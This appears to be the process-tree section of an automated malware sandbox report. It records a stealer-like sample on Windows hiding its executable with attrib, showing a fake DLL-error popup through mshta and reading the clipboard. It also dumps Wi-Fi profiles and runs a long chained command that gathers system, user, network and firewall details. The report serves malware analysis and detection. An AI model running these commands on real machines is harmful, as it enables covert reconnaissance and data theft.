                                                                                                                                                                                                                                            Imagebase:0x7ff799bb0000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                                                            Start time:18:38:34
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist"
                                                                                                                                                                                                                                            Imagebase:0x7ff799bb0000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                                                            Start time:18:38:34
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                                                            Start time:18:38:34
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                                                            Start time:18:38:34
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:tasklist
                                                                                                                                                                                                                                            Imagebase:0x7ff6187b0000
                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                                                                            Start time:18:38:34
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                            Imagebase:0x7ff6e2c90000
                                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                                                            Start time:18:38:36
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\WaltuhiumUpdateService\Waltuhium.exe""
                                                                                                                                                                                                                                            Imagebase:0x7ff799bb0000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                                                                            Start time:18:38:36
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                                                                            Start time:18:38:36
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:attrib +h +s "C:\Users\user\AppData\Local\WaltuhiumUpdateService\Waltuhium.exe"
                                                                                                                                                                                                                                            Imagebase:0x7ff60d400000
                                                                                                                                                                                                                                            File size:23'040 bytes
                                                                                                                                                                                                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                                                                            Start time:18:38:36
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
                                                                                                                                                                                                                                            Imagebase:0x7ff799bb0000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                                                                            Start time:18:38:36
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist"
                                                                                                                                                                                                                                            Imagebase:0x7ff799bb0000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:27
                                                                                                                                                                                                                                            Start time:18:38:36
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                                                                            Start time:18:38:36
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                                                                            Start time:18:38:36
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:tasklist
                                                                                                                                                                                                                                            Imagebase:0x7ff6187b0000
                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:30
                                                                                                                                                                                                                                            Start time:18:38:36
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
                                                                                                                                                                                                                                            Imagebase:0x7ff7da520000
                                                                                                                                                                                                                                            File size:14'848 bytes
                                                                                                                                                                                                                                            MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                                                                            Start time:18:38:38
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
                                                                                                                                                                                                                                            Imagebase:0x7ff799bb0000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:32
                                                                                                                                                                                                                                            Start time:18:38:38
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
                                                                                                                                                                                                                                            Imagebase:0x7ff799bb0000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                                                                            Start time:18:38:38
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:34
                                                                                                                                                                                                                                            Start time:18:38:38
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                            Imagebase:0x7ff799bb0000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:35
                                                                                                                                                                                                                                            Start time:18:38:38
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:36
                                                                                                                                                                                                                                            Start time:18:38:38
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
                                                                                                                                                                                                                                            Imagebase:0x7ff799bb0000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:37
                                                                                                                                                                                                                                            Start time:18:38:38
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff70f330000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:38
                                                                                                                                                                                                                                            Start time:18:38:38
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:39
                                                                                                                                                                                                                                            Start time:18:38:38
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:cmd.exe /c chcp
                                                                                                                                                                                                                                            Imagebase:0x7ff799bb0000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:40
                                                                                                                                                                                                                                            Start time:18:38:38
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:cmd.exe /c chcp
                                                                                                                                                                                                                                            Imagebase:0x7ff799bb0000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:41
                                                                                                                                                                                                                                            Start time:18:38:38
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:powershell.exe Get-Clipboard
                                                                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:42
                                                                                                                                                                                                                                            Start time:18:38:38
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                            Imagebase:0x7ff6187b0000
                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:43
                                                                                                                                                                                                                                            Start time:18:38:39
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:chcp
                                                                                                                                                                                                                                            Imagebase:0x7ff7bca10000
                                                                                                                                                                                                                                            File size:14'848 bytes
                                                                                                                                                                                                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:44
                                                                                                                                                                                                                                            Start time:18:38:39
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:chcp
                                                                                                                                                                                                                                            Imagebase:0x7ff7bca10000
                                                                                                                                                                                                                                            File size:14'848 bytes
                                                                                                                                                                                                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:45
                                                                                                                                                                                                                                            Start time:18:38:39
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                                                                                                                                                                                                                                            Imagebase:0x7ff799bb0000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:46
                                                                                                                                                                                                                                            Start time:18:38:39
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                                                                                                                                                                                                                                            Imagebase:0x7ff799bb0000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:47
                                                                                                                                                                                                                                            Start time:18:38:39
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:48
                                                                                                                                                                                                                                            Start time:18:38:39
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:49
                                                                                                                                                                                                                                            Start time:18:38:39
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:systeminfo
                                                                                                                                                                                                                                            Imagebase:0x7ff691e70000
                                                                                                                                                                                                                                            File size:110'080 bytes
                                                                                                                                                                                                                                            MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:50
                                                                                                                                                                                                                                            Start time:18:38:39
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:netsh wlan show profiles
                                                                                                                                                                                                                                            Imagebase:0x7ff69f960000
                                                                                                                                                                                                                                            File size:96'768 bytes
                                                                                                                                                                                                                                            MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:51
                                                                                                                                                                                                                                            Start time:18:38:39
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                            Imagebase:0x7ff693ab0000
                                                                                                                                                                                                                                            File size:496'640 bytes
                                                                                                                                                                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:52
                                                                                                                                                                                                                                            Start time:18:38:40
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                            Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                                            File size:55'320 bytes
                                                                                                                                                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                            Target ID:53
                                                                                                                                                                                                                                            Start time:18:38:41
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\HOSTNAME.EXE
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:hostname
